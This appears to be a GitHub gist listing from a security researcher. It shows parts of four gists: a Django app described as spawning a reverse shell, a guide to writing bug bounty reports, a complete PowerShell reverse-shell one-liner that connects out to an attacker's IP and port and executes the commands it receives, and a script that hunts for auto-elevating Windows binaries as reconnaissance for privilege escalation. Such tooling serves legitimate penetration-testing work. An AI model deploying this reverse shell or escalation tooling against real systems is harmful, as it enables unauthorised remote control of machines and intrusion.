@riyazwalikar
riyazwalikar / django-rev-shell.py
Created June 1, 2022 04:50
Simple django app that returns a reverse shell when an IP is passed to it.
from distutils.log import error
import sys, socket,os,pty
from django.conf import settings
from django.urls import include, re_path
from django.http import HttpResponse
settings.configure(
    DEBUG=True,
    ROOT_URLCONF=__name__
)
riyazwalikar / how-to-write-a-good-bug-bounty-report.md
Last active March 17, 2020 19:35
how to write a good bug bounty report

How to write a good bug bounty report

  1. Use simple words and avoid complex phrases. Use headings for your report sections.
  2. Mention if authentication is required to exploit the issue.
  3. If authentication is required, elaborate on the privilege required (admin, guest etc.), if applicable.
  4. Provide the URL where the exploit payload is consumed and the parameter/header component that is affected.
  5. Include HTTP requests and responses for multi-step bugs.
  6. Steps to reproduce the issue should ideally be written from the point of view of a user/attacker of the system.
  7. In the steps to reproduce, avoid jumping directly to the URL/parameter being exploited. Don't write "1. Go to http://example.com/api/v1/something/23/, 2. Change 23 to -1". This will not provide context to the reader.
  8. If possible, mention what you think the expected output should be and what you see instead.
riyazwalikar / reverse-shell-powershell.gist
Last active March 30, 2019 10:47
PowerShell reverse shell - handler nc -lvp
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
riyazwalikar / findelevate.py
Last active April 17, 2022 12:34
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
# Usage: findelevate.py C:\Windows\System32\
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx]
import sys
import os
import glob
import subprocess
if len(sys.argv) < 2:
    print("Usage: findelevate.py <PATH>")